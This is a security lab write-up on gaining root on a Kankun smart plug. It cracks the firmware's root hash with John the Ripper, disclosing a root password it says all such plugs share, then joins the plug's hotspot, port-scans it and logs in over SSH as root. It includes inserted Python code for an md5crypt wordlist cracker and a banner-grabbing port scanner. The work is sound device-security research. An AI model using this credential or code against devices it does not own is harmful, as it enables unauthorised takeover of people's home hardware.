CRACKING THE ROOT PASSWORD AND CONNECTING VIA SSH TO THE KANKUN SMART PLUG
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQxA6MeJaX30Ae6PreMTzxSGa6wF-CRnavXIH-k0DAJMOJJbTm43ASRKpFhRyhySnbcJPyB-CjeP_KOwEEskgdS_wDuH1CqrL8sCrNd1Zvu01Vms8msVu-6YMswdEtO8XReY3dTDLgA62/s640/screenshot.14.jpg)
1 - Cracking the root password with John The Ripper
- This exercise builds on the previous one, where the firmware of the Kankun Smart Plug was extracted:
https://dgmsp.blogspot.com/2017/05/11-extracting-and-analyzing-firmware-of.html
- Checking the interesting contents of the file system, for instance the user account database /etc/passwd:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXSkIUWEoZTPIXSVZkSQRwJ6-IjLPw06bqOO2uF5Vs9pYR39ShzdkMNSUJlUdXvBj8exB9FDnXHpbRwP69zhvxTVqR60gVXhG16f3l5Lp_4l_NT5bE7WYaGUm8sGL1SS9CuY90R3SWymlw/s1600/screenshot.4.jpg)
- Also, the file holding the password hashes, /etc/shadow (the x in the password field of /etc/passwd means the hash lives here):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuMay5gtLpH3wz6P78RuiBiKxbwnaIQVykUxUEU1FHFExbHTilVaz_KEF-0sAxJdaMJIsxmKyf0oD_ElOox448GJuQDgN8RhwigRaaVAcr9bFfTgm8Htpg8v4gFl_qhF7A5m_uB92YyRSY/s1600/screenshot.21.jpg)
- Before running John The Ripper against the hashes, let's merge /etc/passwd and /etc/shadow with unshadow into a file named test:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvKCdpjztOqvRPDMfAQfFwAjACG15iFf57i3MUpr3KfU6xQlESi_3My0j8nw_0zjMUq4wtPdEYogLivmOp8dHYJBMsgkeJ0u6uumsKWJ1b2T4Db8MT3OvvFguAqKvchd41h3umIYDvJoHa/s1600/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8C8xFwd02kJoIm4ddAviqUYL8IdZ3z-I6u6FOCeBq98rhTV29Q4nGmOLF6fIqgEijYJuowKOAwQwx-MXE4hFMhYsgtDmm3RYvSWLzpBTZ_N3HaqCXik6gWbrsdYKaduTgK859GdIreYg/s1600/screenshot.1.jpg)
- unshadow combines /etc/passwd and /etc/shadow, replacing the x placeholder of each passwd entry with the corresponding hash from shadow, which is the input format John expects:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHE3sVceJui5wmqoovT7GzylCs0pEdEpzo9BjeN0HXAg794Q7L2tWpycwic4cTEQe0lcYS5n8bfA8Pl2ZZkgL3g7LWfj3CS6bcCgXP_oBvm-_en05hjqpDxB-YiVBYrP1lbynJZWjW0E_z/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyOE4PpoxE_EluGZzxG9FiBPWJa9WNaleytJVddMoe2C7txazXjClezNJhumMrG402z7NLgQoqkQwttlAgZDQPKiorQ0fNwYkyaWQhALuXa1Rfx9RgWGiSWCOUr1roE01jy5tj9QPQh2Bp/s1600/screenshot.2.jpg)
- Running John The Ripper against the merged file cracks the root password: p9z34c. Since the hash ships inside the firmware image rather than being generated per device, the same root password applies to every plug running this firmware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTDtAR5RhcKbCmXjDDgLhVEzwg8vevmEruxG8t1aGSkDtwQa-1MAOx0_fvIMkG7kId-TpzTwZde3501GlHD1Ct1-2G_iHKAy65oWuEBJ9xyu5XEuPgbZUSVtBr3dUzSCjz7Xp_uZ3aNCr/s1600/screenshot.5.jpg)
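To make the unshadow and John steps above concrete without the tools, the following is an added example (not code from the original post) that merges a constructed passwd/shadow pair the way unshadow does and runs a wordlist attack against the result. It assumes the hashes are md5crypt (the `$1$` format that busybox on OpenWrt-era devices produces; the exact format of the real Kankun shadow file is not shown in the text), and reimplements that algorithm with hashlib so it runs offline; entries with other prefixes or locked accounts (`*`, `!`) are skipped. The sample users, hashes and wordlist are constructed for the example.

```python
"""Unshadow plus dictionary attack on md5crypt ($1$) hashes, pure Python.

Added example, not code from the original post. Hash format ($1$) is an
assumption; sample passwd/shadow lines and wordlist are constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v, n):
    """Encode the low 6*n bits of v, least significant group first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return "".join(out)


def md5crypt(password, salt):
    """FreeBSD/glibc md5crypt; returns '$1$<salt>$<22 chars>'."""
    pw = password.encode()
    salt = salt[:8].encode()            # md5crypt uses at most 8 salt chars
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    pl = len(pw)
    while pl > 0:                       # mix in len(pw) bytes of the alt sum
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # one byte per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):               # fixed 1000-round stretching
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    enc = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
           + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
           + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
           + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
           + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
           + _to64(f[11], 2))
    return (magic + salt).decode() + "$" + enc


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): passwd field 2 replaced by the shadow hash."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return "\n".join(merged)


def crack(merged_text, wordlist):
    """Try every wordlist entry against each $1$ hash; return {user: password}."""
    found = {}
    for line in merged_text.splitlines():
        user, h = line.split(":")[:2]
        if not h.startswith("$1$"):
            continue                    # locked (*, !) or unsupported hash type
        salt = h.split("$")[2]
        for candidate in wordlist:
            if md5crypt(candidate, salt) == h:
                found[user] = candidate
                break
    return found


# Constructed sample data (hash is the documented md5crypt test vector for
# 'rasmuslerdorf' with salt 'rasmusle', not anything taken from the plug).
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/ash\nnobody:*:65534:65534:nobody:/var:/bin/false\n"
SAMPLE_SHADOW = "root:$1$rasmusle$rISCgZzpwk3UhDidwXvin0:16000:0:99999:7:::\nnobody:*:0:0:99999:7:::\n"
WORDLIST = ["123456", "password", "admin", "rasmuslerdorf"]

if __name__ == "__main__":
    print(crack(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW), WORDLIST))
```

The 1000 MD5 rounds are why md5crypt is slow enough to matter in the 1990s but cheap today: a six-character lowercase/digit password falls to a modest wordlist or brute force in minutes, which is the real lesson of the hash shipped in this firmware.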
2 - Connecting to the network created by Kankun Smart Plug
- When the Smart Plug is plugged in, the LED shows solid blue for about 20 seconds and then starts blinking slowly:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu791Fk8oB2vx_85CWMvaGmQdlQip10bqhjKcUgcXEg6tTDfKhHknDNeeu4DGrAJzlopXB1wBxRY0yEExMSyziJmMxtO7cy1LRfdJiFXa47Oa-zr4v3413IrPw5gLU8_6XQszbCuWjeTjT/s320/screenshot.16.jpg)
- At that point Kankun acts as a hotspot (Access Point), creating a WiFi network with SSID OK_SP3.
- The attacking machine in this exercise is an Ubuntu virtual machine hosted on Windows 10, which detects the newly created WiFi network OK_SP3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggzu0qafgbnKFgUgmewevEyfoU5Ihb3sHkQ8qh-MOi9R3uFrA_Ev8n7UXldb9Aoat2teaGTE_Kvz5g5x4V7h4hcYZbXNKxaBOYnr75NNAxyULnD32WDKsh3LbOSUV-W4yYQJTDqyV1nDYN/s640/screenshot.6.jpg)
- The characteristics of the wireless network OK_SP3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSJnnaDVyN_YQirSVhC2rxJuOGG-FCtmPlcJqQ9O178sr7A1K6CbFbjIqbeYImQ2TrU445aesjtaH4-soWdR4BxLGgaEuRnAYPtytm0cOQGQiAknAkA-eBBJnUZID3d_84ogYcyBGTJ9p3/s1600/screenshot.7.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLARS_-QQakIMIoy2-yq6jMrO3uN3ZnmYCF0c1LZ5NStGWhzykPt2212UAP_RhfdKIQ6Vc3cCfeuxrhTOgPhttRHi01Yt8-5SRHp29sVrlPYuC9u0q_-UTPuSnfhY9k_OtwquhyNFT064S/s1600/screenshot.8.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQIM1l7VePL9OtjrgNGV1M7GcebhQ7lsU4UCMnuJ3_rH2Xyo98xHKEnKvq69C0uHzZWtxGzGArMEBELppJTZwOlOGj-6UieVqYjvP5OpOkKRS7FHv8y5BYUqQgZvUeTiLEOVsKw011JJE/s1600/screenshot.9.jpg)
- The virtual machine's network adapter is set to Bridged Adapter mode, so that the VM sits directly on the OK_SP3 network:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjbw9E8ncS8fy_MXVa2Xl78rc5hnrVC3xBbMZmc70QGehSeprjm69e2UMefwcm8l8lTFfwOGTlxuSKlp3DdRlgpPRT57K9THt5pSdU_bDxoyMHYMDNXhroVudQcypsA16JlaIyd6fDnmO/s1600/screenshot.1.jpg)
- Inside the Ubuntu virtual machine we see that Kankun (acting as Access Point) has assigned Ubuntu the IP address 192.168.10.140:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSgeGyRi0H6QVIrRivN52Kj5LYA3nCaSNq2Fsi1IIOkiMdyRoLGol01_UrfF-F8L0AEXwzBLxd1GNMBzTpkcjO8n5kHmmMkhGgjkb2I3dvo7XcQpGV_4u34mxW3VlVRpiU6Z4MI-W-eqyQ/s1600/screenshot.3.jpg)
3 - Accessing via SSH
- From Ubuntu, connected to the hotspot's network (192.168.10.0/24), let's discover the other hosts:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXL140XnL9LEXjKEaYKXDYFsHsBhTQIum0uoM5XXc7JxIhxGjOHYLS-myWbPQRtw7X69m0YY0p97ENz2fYtkpZjD5LoAKXBBEfQs6Oiygnos8jGTWbnJth75O0sOoH3AhRUGRQNvg0kh2Q/s1600/screenshot.4.jpg)
- The host 192.168.10.253 is the Kankun Smart Plug itself, acting as the gateway for every device that joins OK_SP3. Pinging it from Ubuntu:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-rIbrcVmFfwM4-2v4V6zdHJ-1sVoEd6Ck7Yk0-jAbcnF6k6X92euiLdoJeUOQ4edqDqJaamQCn0odIEr7-OtckCEZgQf0R8JuJAbZLB4-nKEpG3_3ahMdx8blNsmrdqOsbPjG3Sw1PKTD/s1600/screenshot.5.jpg)
- Let's scan the ports of Kankun:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQLxVJEafkQX1Lp8X7fUMvpqO364BIa85VbKD2Uh0cTV0o5BWfHaZAPUnMJf4o0gt4Kp-3sJDbgzyYBP-0j-Zq6sJimhlRjBeFmzG6tfugZD_pFisR8a4P_ZFmYgtr4RaELGq-GmKc3mGp/s1600/screenshot.10.jpg)
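As an added example (not code from the original post) of what the port scan establishes, the script below sweeps a list of TCP ports and grabs the first line each open service sends, which for SSH is the version banner that identifies the server software. Against the plug the host would be 192.168.10.253 and the interesting port 22; so that it runs offline, a constructed banner server on 127.0.0.1 stands in for the device. The Dropbear banner text is an assumption (OpenWrt normally ships Dropbear as its SSH server), not something the post shows.

```python
"""Minimal TCP port sweep with SSH banner grab.

Added example, not code from the original post. The fake server and its
Dropbear-style banner are constructed so the scan can run offline.
"""
import socket
import threading

FAKE_BANNER = b"SSH-2.0-dropbear_2014.63\r\n"   # constructed sample banner


def start_fake_ssh_server():
    """Listen on an ephemeral 127.0.0.1 port and send FAKE_BANNER to each client.

    Returns (port, listening_socket); close the socket to stop the server.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listening socket was closed
                return
            with conn:
                try:
                    conn.sendall(FAKE_BANNER)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


def free_closed_port():
    """Pick a port nothing listens on: bind to 0, read the number, close."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe_port(host, port, timeout=1.0):
    """Return (is_open, banner); banner is the service's first line or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(256)
            except socket.timeout:       # open but silent (client speaks first)
                data = b""
    except OSError:                      # refused, unreachable or timed out
        return False, None
    first = data.split(b"\n", 1)[0].rstrip(b"\r")
    return True, (first.decode("ascii", "replace") or None)


def is_ssh(banner):
    """SSH servers announce themselves as 'SSH-<proto>-<software>' (RFC 4253)."""
    return banner is not None and banner.startswith("SSH-")


def scan(host, ports):
    """Map each open port to its banner (None if the service sent nothing)."""
    found = {}
    for p in ports:
        is_open, banner = probe_port(host, p)
        if is_open:
            found[p] = banner
    return found


if __name__ == "__main__":
    port, srv = start_fake_ssh_server()
    print(scan("127.0.0.1", [port, free_closed_port()]))
    srv.close()
```

The banner is worth reading before trying the password: the software name and version tell you which SSH implementation the plug runs and therefore which authentication methods and known weaknesses to expect, which nmap's service detection does the same way.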
- Having found that SSH port 22 is open, let's connect to Kankun via SSH using the root password we cracked (p9z34c):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrp6d87uohXZMoeGsPQ0x462esuJSJfYuQGWhJmLtnMnlJP8vSrBUvnfngYWXLcY8f_A31HvLUb5Y4jyHhkEONDlhtaUSyRC9ru-Z_Ek6wYFUfVEyZ7I01ZYMNAGDQ3y5DO4bw2AuvPKfr/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh77eZ8mthGvSqpYeGLJ0TvXBqghBCCq7IXSdCINCHXl-TqoNUXmgPg7aFGhtF53qlAGcQ0tkBpC5JbrJCrKJKz5H_wbYps0hCA5eveOA-CRF_jd9R4yPtB1ZE8ddnB4zIl_SJYDxSLkK7/s1600/screenshot.12.jpg)
- The session has all the privileges of the root user:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6OIDTzygcEhOud2UzOTrXz6lRm0tVBuIsSqir8PSfwXoYrLwOQf-AEvfA9kOVFaElWpnp1aSn0-eNv0Lj3KlcTMxHgScpSW2RfRgND2HeRkaAxRC9g7pB9iVrn07mUEsrc5TPltBEjou5/s400/screenshot.13.jpg)
- Checking the IP address of Kankun:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTw5pZlcepBEpTbjcEmcg5OMNJGOxc2X-Mtg-VYxJ_4t9pL-S7srmlzvnTo3MnILKeIJLNvQCP5XZEYJ7EB8wHlUYvAeC99v8nteMGYCWpAUAB0YPgPdJrqD76iYixGQYRNquoCIzLePvm/s1600/screenshot.14.jpg)
- We have access to the whole root file system of the Kankun Smart Plug:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBb-cYfwvc9zvHl8t2cx-ew0eCWoavsoGMRS8XF2wFhOe-aC8DkJHSKV4E6F982r8f2DOfP6QXhcZUSLs02stZy0q4Hr5JpYtKFs1HHo9qCgay2Cxxoil9CSDq7_jpRwu6jzkgtRrdozC3/s1600/screenshot.15.jpg)